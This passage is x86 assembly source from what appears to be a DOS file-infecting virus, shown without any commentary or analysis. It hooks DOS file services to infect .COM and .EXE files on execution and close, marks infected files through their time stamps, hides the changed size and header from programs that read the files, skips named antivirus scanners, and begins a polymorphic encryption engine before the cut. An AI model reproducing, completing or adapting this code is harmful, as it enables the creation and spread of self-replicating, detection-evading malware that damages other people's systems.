        mov ah,1Fh
        and al,ah
        cmp al,ah
        jne no_get_time
        call pop_all
        and cl,0E0h
        jmp short exit_get_time
no_get_time:
        call pop_all
exit_get_time:
        call unhook_ints
        stc
        cmc
        retf 2
;----------------------------------------------------------------------------
;Set file date/time
;----------------------------------------------------------------------------
dos_set_time:        
        call pop_all
        call push_all        
;Get address of sft entry
        call get_sft        
        jc no_set_time        
;Check if file is already infected        
        mov al,byte ptr es:[di+0Dh]
        mov ah,1Fh
        and al,ah
        cmp al,ah
        je ok_set_time
no_set_time:
;Exit if not infected or error
        jmp m21h_exit
ok_set_time:        
;Perform time change but restore our marker
        call pop_all
        or cl,1Fh
        call push_all
        jmp m21h_exit
;----------------------------------------------------------------------------
;Open file
;----------------------------------------------------------------------------
dos_open:
;Call dos function
        call pop_all
        int 03h
        jnc do_open
open_fail:
        call unhook_ints
        stc
        retf 2
do_open:
        call push_all
;Get sft for file handle
        xchg bx,ax
        call get_sft
        jc no_changes
;Check if file is infected        
        mov al,byte ptr es:[di+0Dh]
        mov ah,1Fh
        and al,ah
        cmp al,ah
        jne no_changes
;If infected stealth true size
        sub word ptr es:[di+11h],lenvir
        sbb word ptr es:[di+13h],0000h
no_changes:
        call unhook_ints
        call pop_all
        stc
        cmc
        retf 2
;----------------------------------------------------------------------------
;Read file
;----------------------------------------------------------------------------
dos_read:
;Restore function entry regs
        call pop_all
        call push_all
;Duplicate handle
        mov ah,45h
        int 03h
        jc no_read_stealth        
        xchg bx,ax
        push ax
;Close new handle in order to update directory entry
        mov ah,3Eh
        int 03h
        pop bx
;Get address of sft entry
        call get_sft        
        jc no_read_stealth        
;Check if file is already infected        
        mov al,byte ptr es:[di+0Dh]
        mov ah,1Fh
        and al,ah
        cmp al,ah
        jne no_read_stealth
;Check and save current offset in file
        mov ax,word ptr es:[di+15h]
        cmp ax,0019h
        jae no_read_stealth
        cmp word ptr es:[di+17h],0000h
        jne no_read_stealth
        mov word ptr cs:[file_offset],ax
        call pop_all
;Save address of read buffer
        mov word ptr cs:[read_off],dx
        mov word ptr cs:[read_seg],ds
;Perform read operation
        int 03h
        jnc check_read
;Error during file read
        call unhook_ints
        stc
        retf 2
no_read_stealth:       
;Exit if no read stealth        
        jmp m21h_exit
check_read:
        call push_all
        call get_sft
;Save offset position
        push word ptr es:[di+15h]
        push word ptr es:[di+17h]
;Save file size
        push word ptr es:[di+11h]
        push word ptr es:[di+13h]
;Add virus size to file size
        add word ptr es:[di+11h],lenvir
        adc word ptr es:[di+13h],0000h
;Point to old header in file
        call seek_end
        sub word ptr es:[di+15h],0019h+01h
        sbb word ptr es:[di+17h],0000h
;Read old header and encryption key
        push cs
        pop ds
        mov ah,3Fh
        mov cx,0019h+01h
        mov dx,offset virus_copy
        int 03h
        jc exit_read
;Decrypt header
        mov cx,0019h
        push dx
        pop si
        mov al,byte ptr cs:[si+19h]
decrypt_header:
        xor byte ptr cs:[si+00h],al
        inc si
        loop decrypt_header
;Move old header into read buffer
        les di,dword ptr cs:[read_ptr]
        mov si,offset virus_copy
        mov cx,0019h-01h
        mov ax,word ptr cs:[file_offset]
        add di,ax
        add si,ax
        sub cx,ax
        cld
        rep movsb
exit_read:
        call get_sft
;Restore file size
        pop word ptr es:[di+13h]
        pop word ptr es:[di+11h]
;Restore old offset in file
        pop word ptr es:[di+17h]
        pop word ptr es:[di+15h]
;Restore regs and exit
        call unhook_ints
        call pop_all
        stc
        cmc
        retf 2
;----------------------------------------------------------------------------
;Infect file at execution ds:dx ptr to filename
;----------------------------------------------------------------------------
dos_exec:
;Open file for read-only
        mov ax,3D00h
        int 03h
        jnc ok_file_open
        jmp file_error
ok_file_open:
        xchg bx,ax
        jmp short from_open
;----------------------------------------------------------------------------
;Infect file at close
;----------------------------------------------------------------------------
dos_close:
        call pop_all
        call push_all
;Duplicate handle
        mov ah,45h
        int 03h
        jc file_error
        xchg bx,ax
        push ax
;Close new handle in order to update directory entry
        mov ah,3Eh
        int 03h
        pop bx
from_open:
;Get sft address in es:di
        call get_sft
        jc file_error
;Check device info word
        mov ax,word ptr es:[di+05h]
;Check if character device handle       
        test al,80h
        jnz file_error
;Check if remote file handle
        test ah,0Fh
        jnz file_error
;Check if file is already infected
        mov al,byte ptr es:[di+0Dh]
        mov ah,1Fh
        and al,ah
        cmp al,ah
        je file_error
;Do not infect files with todays date
        mov al,byte ptr es:[di+0Fh]
        and al,1Fh
        cmp al,byte ptr cs:[today]
        je file_error
;Check file name in sft
        mov cx,0Bh
        mov si,di
name_loop:
;Do not infect files with numbers in their file name
        cmp byte ptr es:[si+20h],"0"
        jb file_name1
        cmp byte ptr es:[si+20h],"9"
        jbe file_error
file_name1:       
;Do not infect files witch name contains v's
        cmp byte ptr es:[si+20h],"V"
        je file_error
;Do not infect files with mo in their name
        inc si
        loop name_loop
;Get first pair
        mov ax,word ptr es:[di+20h]
;Do not infect Thunderbyte antivirus utils        
        cmp ax,"BT"
        je file_error
;Do not infect McAfee's Scan
        cmp ax,"CS"
        je file_error
;Do not infect F-Prot scanner
        cmp ax,"-F"
        je file_error
;Do not infect Solomon's Guard
        cmp ax,"UG"
        jne file_infection
file_error:
        jmp m21h_exit
file_infection:
;Save and set file open mode (read/write)
        mov cx,0002h
        xchg cx,word ptr es:[di+02h]
        push cx
;Save and set file attribute
        xor al,al
        xchg al,byte ptr es:[di+04h]
        push ax
        test al,04h
        jnz system_file
;Save and set file pointer position
        push word ptr es:[di+15h]
        push word ptr es:[di+17h]
        call seek_begin
;Read first 20h bytes 
        push cs
        pop ds
        mov ah,3Fh
        mov cx,0020h
        mov dx,offset file_buffer
        int 03h
;Seek to end of file and get file size
        call seek_end
;Do not infect too small .exe or .com files
        or dx,dx
        jnz ok_min_size
        cmp ax,lenvir+0410h
        jbe exit_inf
ok_min_size:
;Check for .com extension        
        cmp word ptr es:[di+28h],"OC"
        jne no_com
        cmp byte ptr es:[di+2Ah],"M"
        je inf_com
no_com:
;Check for .exe mark in file header
        mov cx,word ptr cs:[file_buffer+00h]
;Add markers M+Z
        add cl,ch
        cmp cl,"Z"+"M"
        jne exit_inf
;Check for .exe extension        
        cmp word ptr es:[di+28h],"XE"
        jne exit_inf
        cmp byte ptr es:[di+2Ah],"E"
        jne exit_inf
        jmp inf_exe
;----------------------------------------------------------------------------
;Exit from file infection
;----------------------------------------------------------------------------
exit_inf:
;Restore file pointer position
        pop word ptr es:[di+17h]
        pop word ptr es:[di+15h]
system_file:          
;Restore file attribute 
        pop ax
        mov byte ptr es:[di+04h],al
;Restore file open mode
        pop word ptr es:[di+02h]
;Do not set file date/time on closing
        or byte ptr es:[di+06h],40h
;Check if close function
        cmp byte ptr cs:[dos_function+01h],(3Eh xor 0FFh)
        je no_close_file
;Close file
        mov ah,3Eh
        int 03h
no_close_file:
        jmp m21h_exit
;----------------------------------------------------------------------------
;Infect .COM file
;----------------------------------------------------------------------------
inf_com:
;Don't infect too big .com files
        cmp ax,0FFFFh-(lenvir+10h)
        jae exit_inf
;Copy header
        call copy_header
;Get file length as entry point
        sub ax,03h
;Write a jump to virus into header
        mov byte ptr cs:[file_buffer+00h],0E9h
        mov word ptr cs:[file_buffer+01h],ax
;Set .com marker 
        mov byte ptr cs:[prog_type],"C"
;Encrypt and infect
        jmp get_control
;----------------------------------------------------------------------------
;Infect .EXE file
;----------------------------------------------------------------------------
inf_exe:       
;Don't infect Windows programs
        cmp word ptr cs:[file_buffer+18h],0040h
        jae bad_exe
;Don't infect overlays
        cmp word ptr cs:[file_buffer+1Ah],0000h
        jne bad_exe
;Check maxmem field
        cmp word ptr cs:[file_buffer+0Ch],0FFFFh
        jne bad_exe
;Save file size
        push ax
        push dx
;Page ends on 0200h boundary
        mov cx,0200h
        div cx
        or dx,dx
        jz no_round_1
        inc ax
no_round_1:
        cmp ax,word ptr cs:[file_buffer+04h]
        jne no_fit_size
        cmp dx,word ptr cs:[file_buffer+02h]
        je header_ok
no_fit_size:
        pop dx
        pop ax
bad_exe:
;Exit if cant infect .exe
        jmp exit_inf
header_ok:
        call copy_header
        pop dx
        pop ax
        push ax
        push dx
        mov cx,10h
        div cx
        sub ax,word ptr cs:[file_buffer+08h]
;Store new entry point
        mov word ptr cs:[file_buffer+14h],dx
        mov word ptr cs:[file_buffer+16h],ax
;Store new stack position
        add dx,lenvir+0410h
        and dx,0FFFEh
        inc ax
        mov word ptr cs:[file_buffer+0Eh],ax
        mov word ptr cs:[file_buffer+10h],dx
;Restore size
        pop dx
        pop ax
;Add virus size to file size
        add ax,lenvir
        adc dx,0000h
;Page ends on 0200h boundary
        mov cx,0200h
        div cx
        or dx,dx
        jz no_round_2
        inc ax
no_round_2:
;Store new size
        mov word ptr cs:[file_buffer+04h],ax
        mov word ptr cs:[file_buffer+02h],dx
;Set .exe marker 
        mov byte ptr cs:[prog_type],"E"
;Encryption an infection continues on next routine
;----------------------------------------------------------------------------
;Encryption and physical infection
;----------------------------------------------------------------------------
get_control:
        call do_encrypt
;Write virus body to the end of file
        mov ah,40h
        mov cx,lenvir
        mov dx,offset virus_copy
        int 03h
        jc no_good_write
;Seek to beginning of file
        call seek_begin
;Write new header
        mov ah,40h
        mov cx,0019h-01h
        mov dx,offset file_buffer
        int 03h
;Mark file as infected
        or byte ptr es:[di+0Dh],1Fh
no_good_write:
;Jump to infection end
        jmp exit_inf        
;----------------------------------------------------------------------------
;Encrypt virus body with variable key and generate a
;polymorphic decryptor.
;----------------------------------------------------------------------------
do_encrypt:
        call push_all
;Initialize engine
        xor ax,ax        
        mov word ptr cs:[last_subroutine],ax
        mov word ptr cs:[decrypt_sub],ax
        mov word ptr cs:[last_fill_type],ax
        dec ax
        mov word ptr cs:[last_step_type],ax
        mov byte ptr cs:[last_int_type],al
        mov byte ptr cs:[decrypt_pointer],al
;Choose counter and pointer register
        call get_rnd
        and al,01h
        mov byte ptr cs:[address_register],al
;Choose register for decryption instructions
